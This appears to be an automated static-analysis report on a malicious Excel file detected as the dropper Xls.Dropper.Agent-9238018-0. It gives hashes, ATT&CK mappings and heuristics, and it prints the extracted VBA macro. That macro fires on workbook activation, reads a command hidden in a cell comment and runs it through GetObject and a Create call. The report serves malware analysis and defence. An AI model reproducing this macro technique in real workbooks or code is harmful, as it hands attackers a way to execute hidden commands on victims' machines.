Xls.Dropper.Agent-9238018-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 53604dccd6756ae1…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 80.7 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-07
MD5: 5521a14421fbf76c3696f8b52fd300fb
SHA-1: 40261e933ad21244a03485b01df36a2c2547f4d1
SHA-256: 53604dccd6756ae1de7afd13bd052ded0a41497ac718118bf2c8a9aa33bf88c9
Risk score: 180

Malware Insights

Xls.Dropper.Agent-9238018-0 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.011 Signed Binary Proxy Execution: Rundll32

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-9238018-0. Static analysis reveals the presence of VBA macros, specifically a GetObject call within the Workbook_Activate and Worksheet_Change subroutines. This suggests the macro is designed to execute a secondary payload, likely by leveraging the GetObject function to run external code.

Heuristics (3)

  • ClamAV: Xls.Dropper.Agent-9238018-0 [severity: critical, rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Dropper.Agent-9238018-0
  • VBA project inside OOXML [severity: medium, rule: OOXML_VBA, 1 related finding]
    Document contains a VBA project; VBA macros present
  • GetObject call [severity: high, rule: OLE_VBA_GETOBJ]
    GetObject call

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 1104 bytes
SHA-256: d154053d78b58f6e4e342586f821e33f674801ac2d8096e8fc42056e49f9bab3
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
    ' Writing a value into A500 on the active sheet triggers that sheet's
    ' Worksheet_Change handler (the Sheet1 module below)
    Range("A500").Value = 3.14159
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Worksheet_Change(ByVal target As Range)
    Dim xxWk, RoVzT, Ovbvaf
    ' The payload string is hidden in the cell comment attached to C500
    xxWk = ThisWorkbook.ActiveSheet.Range("C500").Comment.Text
    ' Split on the "<.>" delimiter: element 0 is handed to GetObject,
    ' element 1 becomes the first argument of the Create call
    RoVzT = Split(xxWk, "<.>")
    Ovbvaf = pIwFg(RoVzT(1), RoVzT(0))
End Sub

Function pIwFg(A2, A1)
    Dim jlvrPtx, IqVgLXmH, rSol, intProcessID
    ' GetObject binds whatever moniker string arrived in A1; the comment
    ' text itself was not carved, so the moniker and command are not in this report
    Set jlvrPtx = GetObject(A1)
    IqVgLXmH = A2
    ' Four-argument Create call on the bound object, receiving a process id back
    rSol = jlvrPtx.Create(IqVgLXmH, Null, Null, intProcessID)
End Function
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 17408 bytes
SHA-256: 91e5dd3e20d6c909df5f515e0514b079e9b537e285c9bb0c853c9e418e92710b
Detection
ClamAV: Xls.Dropper.Agent-9238018-0
Obfuscation or payload: unlikely